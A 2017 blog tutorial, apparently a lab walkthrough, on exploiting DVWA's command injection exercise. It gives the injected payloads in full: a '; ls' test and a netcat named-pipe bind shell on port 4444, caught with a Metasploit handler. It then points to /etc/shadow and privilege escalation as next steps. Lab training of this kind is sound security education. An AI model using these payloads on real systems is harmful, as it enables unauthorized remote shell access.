Did you know that you can navigate the posts by swiping left and right?

Exploiting Command Injection vulnerabilities

18 Apr 2017 . category: tech . Comments
#redteam #kali #dvwa #metasploit

Command Injection is the manipulation of a vulnerable software in order to execute arbitrary commands on the host operating system. Command Injections are possible when the application skips the input validation and uses it for executing a shell command on the host operating system. in this post we’ll get our hands on DVWA’s Command Injection section, and we’ll open a backdoor on the server using Metasploit.

Visit the Command Injection section of DVWA.


The page says that it will ping an IP address for us, so let’s see what will do for the IP


Now, let’s try to append a list bash command after our input IP address:; ls


Sweet, DVWA simply appends our input to the underlying bash command!

Now, let’s listen on port 4444 using netcat and redirect all the incoming bytes to a bash shell:; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe


As you will notice, the page is loading forever, which means that our backdoor is open and waiting for us… :smile:

Let’s start msfconsole and open the shell on the server:

use exploit/multi/handler
set payload linux/x64/shell/bind_tcp


Note that we didn’t set the LPORT of bind_tcp, since the default one is 4444.

As you can see, we are the www-data user, and that’s why we can’t read the /etc/shadow file, which contains the user passwords of the operating system. But, we have all the privileges that www-data user has and we can e.g. modify DVWA or escalate to root, by exploiting a local privilege escalation vulnerability.

Happy binding!


Panos is a Computer Scientist with scientific publications in top conferences and journals, several patent applications, open-source contributions on privacy preserving products and a proven track record of delivering secure, reliable and fast cloud services. In the past, he worked as a Linux kernel developer at the CERN CERT team, did Machine Learning research at the University of Athens and innovated on Microsoft’s Office 365 cloud services. Currently he is on a mission to contribute to the mass adoption of cryptocurrencies.